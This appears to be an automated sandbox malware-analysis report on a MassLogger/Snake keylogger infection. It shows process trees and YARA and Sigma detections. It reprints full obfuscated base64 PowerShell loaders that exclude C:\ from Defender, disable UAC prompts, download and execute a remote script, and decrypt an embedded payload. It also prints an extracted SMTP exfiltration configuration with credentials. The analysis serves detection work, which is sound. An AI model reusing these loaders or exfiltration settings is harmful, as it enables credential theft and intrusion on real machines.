xlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRid2p2cGFqcnB1d2R2a2h2ZW90eXZhc2xiPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRnbm5icmFkeXV6emFpY3F6amdvdWx3dmRhPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGJ3anZwYWpycHV3ZHZraHZlb3R5dmFzbGIsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuQ29weVRvKCRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuRGlzcG9zZSgpOwkkYndqdnBhanJwdXdkdmtodmVvdHl2YXNsYi5EaXNwb3NlKCk7CSRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiLkRpc3Bvc2UoKTsJJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGIuVG9BcnJheSgpO31mdW5jdGlvbiBxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuKCRwYXJhbV92YX
IsJHBhcmFtMl92YXIpewkJSUVYICckbGJwYnNmYnhoZ3FrdHh2amxudHJ4Yndta3pmbHFwa3NqYmZ6b3didT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2PSRsYnBic2ZieGhncWt0eHZqbG50cnhid21remZscXBrc2piZnpvd2J1LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2LkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kcW1ka3hmZndnbGliZXJiZWl1eGFvZnJnbyA9ICRlbnY6VVNFUk5BTUU7JG1scXhnYmJ4cnl1dnR6c29lY3ZmcWl5enQgPSAnQzpcVXNlcnNcJyArICRxbWRreGZmd2dsaWJlcmJlaXV4YW9mcmdvICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbWxxeGdiYnhyeXV2dHpzb2VjdmZxaXl6dDskdWR5eHI9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRtbHF4Z2JieHJ5dXZ0enNvZWN2ZnFpeXp0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeWRhIGluICR1ZHl4cikgewlpZiAoJHlkYS5TdGFydHNXaXRoKCc6OicpKQl7CQkkZG5xZWw9JHlkYS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kdnRzcHN1bmViZWl0bXlzbHNnamhqemFncz1bc3RyaW5nW11dJGRucWVsLlNwbGl0KCdcJyk7SUVYICckcHpvY2V4eW52bmh0dG9jd3NuenhlY25xcD1pYnB4Z21oanR3a2Jnem4gKHlsY2Z4ZmV0ZHdqc2RpciAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCR2dHNwc3VuZWJlaXRteXNsc2dqaGp6YWdzWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGs9aWJweGdtaGp0d2tiZ3puICh5bGNmeGZldGR3anNkaXIgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkdnRzcHN1bmViZWl0bXlzbHNnamhqemFnc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuICRwem9jZXh5bnZuaHR0b2N3c256eGVjbnFwICRudWxsO3FtYWlubW14bnpheHpocm9od2xoeHBwcm4gJGV3Ym5ud3Rtd2R1emN4aGtncmtrcn
lyaGsgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • WerFault.exe (PID: 6980 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 3388 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 4012 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_801.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 5780 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5692 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7564 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdk
x6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRid2p2cGFqcnB1d2R2a2h2ZW90eXZhc2xiPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRnbm5icmFkeXV6emFpY3F6amdvdWx3dmRhPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGJ3anZwYWpycHV3ZHZraHZlb3R5dmFzbGIsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuQ29weVRvKCRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuRGlzcG9zZSgpOwkkYndqdnBhanJwdXdkdmtodmVvdHl2YXNsYi5EaXNwb3NlKCk7CSRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiLkRpc3Bvc2UoKTsJJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGIuVG9BcnJheSgpO31mdW5jdGlvbiBxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuKCRwYXJhbV92YX
IsJHBhcmFtMl92YXIpewkJSUVYICckbGJwYnNmYnhoZ3FrdHh2amxudHJ4Yndta3pmbHFwa3NqYmZ6b3didT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2PSRsYnBic2ZieGhncWt0eHZqbG50cnhid21remZscXBrc2piZnpvd2J1LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2LkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kcW1ka3hmZndnbGliZXJiZWl1eGFvZnJnbyA9ICRlbnY6VVNFUk5BTUU7JG1scXhnYmJ4cnl1dnR6c29lY3ZmcWl5enQgPSAnQzpcVXNlcnNcJyArICRxbWRreGZmd2dsaWJlcmJlaXV4YW9mcmdvICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbWxxeGdiYnhyeXV2dHpzb2VjdmZxaXl6dDskdWR5eHI9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRtbHF4Z2JieHJ5dXZ0enNvZWN2ZnFpeXp0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeWRhIGluICR1ZHl4cikgewlpZiAoJHlkYS5TdGFydHNXaXRoKCc6OicpKQl7CQkkZG5xZWw9JHlkYS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kdnRzcHN1bmViZWl0bXlzbHNnamhqemFncz1bc3RyaW5nW11dJGRucWVsLlNwbGl0KCdcJyk7SUVYICckcHpvY2V4eW52bmh0dG9jd3NuenhlY25xcD1pYnB4Z21oanR3a2Jnem4gKHlsY2Z4ZmV0ZHdqc2RpciAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCR2dHNwc3VuZWJlaXRteXNsc2dqaGp6YWdzWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGs9aWJweGdtaGp0d2tiZ3puICh5bGNmeGZldGR3anNkaXIgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkdnRzcHN1bmViZWl0bXlzbHNnamhqemFnc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuICRwem9jZXh5bnZuaHR0b2N3c256eGVjbnFwICRudWxsO3FtYWlubW14bnpheHpocm9od2xoeHBwcm4gJGV3Ym5ud3Rtd2R1emN4aGtncmtrcn
lyaGsgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • WerFault.exe (PID: 7324 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 3336 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 1964 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_87.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 3332 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3144 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5044 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • wscript.exe (PID: 1088 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_412.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7916 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1200 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5332 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
{"EXfil Mode": "SMTP", "From": "ozge.begindim@pakmeya.com", "Password": "Sapsup1481", "Server": "mail.privateemail.com"}
Source | Rule | Description | Author
0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x10dff:$a1: get_encryptedPassword
  • 0x1113b:$a2: get_encryptedUsername
  • 0x10b7a:$a3: get_timePasswordChanged
  • 0x10c9b:$a4: get_passwordField
  • 0x10e15:$a5: set_encryptedPassword
  • 0x127ee:$a7: get_logins
  • 0x1249f:$a8: GetOutlookPasswords
  • 0x1227d:$a9: StartKeylogger
  • 0x1273e:$a10: KeyLoggerEventArgs
  • 0x122da:$a11: KeyLoggerEventArgsEventHandler
00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
Source | Rule | Description | Author
30.2.powershell.exe.a64805c.3.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
30.2.powershell.exe.a64805c.3.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0xe477:$a1: get_encryptedPassword
  • 0xe7b3:$a2: get_encryptedUsername
  • 0xe1f2:$a3: get_timePasswordChanged
  • 0xe313:$a4: get_passwordField
  • 0xe48d:$a5: set_encryptedPassword
  • 0xfe66:$a7: get_logins
  • 0xfb17:$a8: GetOutlookPasswords
  • 0xf8f5:$a9: StartKeylogger
  • 0xfdb6:$a10: KeyLoggerEventArgs
  • 0xf952:$a11: KeyLoggerEventArgsEventHandler
79.2.powershell.exe.5a119c0.0.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
79.2.powershell.exe.5a119c0.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
79.2.powershell.exe.5a119c0.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
Source | Rule | Description | Author
amsi32_1276.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x87:$b2: ::FromBase64String(
  • 0x6d:$b3: ::UTF8.GetString(
  • 0xd31e:$b3: ::UTF8.GetString(
  • 0xd7cf:$b3: ::UTF8.GetString(
  • 0xcfa0:$s1: -join
  • 0xd357:$s1: -join
  • 0xd808:$s1: -join
  • 0xd9a5:$s1: -join
  • 0xda1b:$s1: -join
  • 0xe112:$s1: -join
  • 0x674c:$s4: +=
  • 0x680e:$s4: +=
  • 0xaa35:$s4: +=
  • 0xcb52:$s4: +=
  • 0xce3c:$s4: +=
  • 0xcf82:$s4: +=
  • 0x3beb5:$s4: +=
  • 0x3bf35:$s4: +=
  • 0x3bffb:$s4: +=
  • 0x3c07b:$s4: +=
  • 0x3c251:$s4: +=
amsi32_7628.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x87:$b2: ::FromBase64String(
  • 0x6d:$b3: ::UTF8.GetString(
  • 0x9bb6:$b3: ::UTF8.GetString(
  • 0xa067:$b3: ::UTF8.GetString(
  • 0x9838:$s1: -join
  • 0x9bef:$s1: -join
  • 0xa0a0:$s1: -join
  • 0xa23d:$s1: -join
  • 0xa2b3:$s1: -join
  • 0xa9aa:$s1: -join
  • 0x2fe4:$s4: +=
  • 0x30a6:$s4: +=
  • 0x72cd:$s4: +=
  • 0x93ea:$s4: +=
  • 0x96d4:$s4: +=
  • 0x981a:$s4: +=
  • 0x36c3a:$s4: +=
  • 0x36cba:$s4: +=
  • 0x36d80:$s4: +=
  • 0x36e00:$s4: +=
  • 0x36fd6:$s4: +=
amsi32_8000.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x87:$b2: ::FromBase64String(
  • 0x6d:$b3: ::UTF8.GetString(
  • 0x9bb6:$b3: ::UTF8.GetString(
  • 0xa067:$b3: ::UTF8.GetString(
  • 0x9838:$s1: -join
  • 0x9bef:$s1: -join
  • 0xa0a0:$s1: -join
  • 0xa23d:$s1: -join
  • 0xa2b3:$s1: -join
  • 0xa9aa:$s1: -join
  • 0x2fe4:$s4: +=
  • 0x30a6:$s4: +=
  • 0x72cd:$s4: +=
  • 0x93ea:$s4: +=
  • 0x96d4:$s4: +=
  • 0x981a:$s4: +=
  • 0x36c3a:$s4: +=
  • 0x36cba:$s4: +=
  • 0x36d80:$s4: +=
  • 0x36e00:$s4: +=
  • 0x36fd6:$s4: +=
amsi32_4696.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x87:$b2: ::FromBase64String(
  • 0x6d:$b3: ::UTF8.GetString(
  • 0x9bb6:$b3: ::UTF8.GetString(
  • 0xa067:$b3: ::UTF8.GetString(
  • 0x9838:$s1: -join
  • 0x9bef:$s1: -join
  • 0xa0a0:$s1: -join
  • 0xa23d:$s1: -join
  • 0xa2b3:$s1: -join
  • 0xa9aa:$s1: -join
  • 0x2fe4:$s4: +=
  • 0x30a6:$s4: +=
  • 0x72cd:$s4: +=
  • 0x93ea:$s4: +=
  • 0x96d4:$s4: +=
  • 0x981a:$s4: +=
  • 0x36c3a:$s4: +=
  • 0x36cba:$s4: +=
  • 0x36d80:$s4: +=
  • 0x36e00:$s4: +=
  • 0x36fd6:$s4: +=
amsi32_7892.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x87:$b2: ::FromBase64String(
  • 0x6d:$b3: ::UTF8.GetString(
  • 0x9bb6:$b3: ::UTF8.GetString(
  • 0xa067:$b3: ::UTF8.GetString(
  • 0x9838:$s1: -join
  • 0x9bef:$s1: -join
  • 0xa0a0:$s1: -join
  • 0xa23d:$s1: -join
  • 0xa2b3:$s1: -join
  • 0xa9aa:$s1: -join
  • 0x2fe4:$s4: +=
  • 0x30a6:$s4: +=
  • 0x72cd:$s4: +=
  • 0x93ea:$s4: +=
  • 0x96d4:$s4: +=
  • 0x981a:$s4: +=
  • 0x36c3a:$s4: +=
  • 0x36cba:$s4: +=
  • 0x36d80:$s4: +=
  • 0x36e00:$s4: +=
  • 0x36fd6:$s4: +=

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\windowsupdate.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\windowsupdate.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; 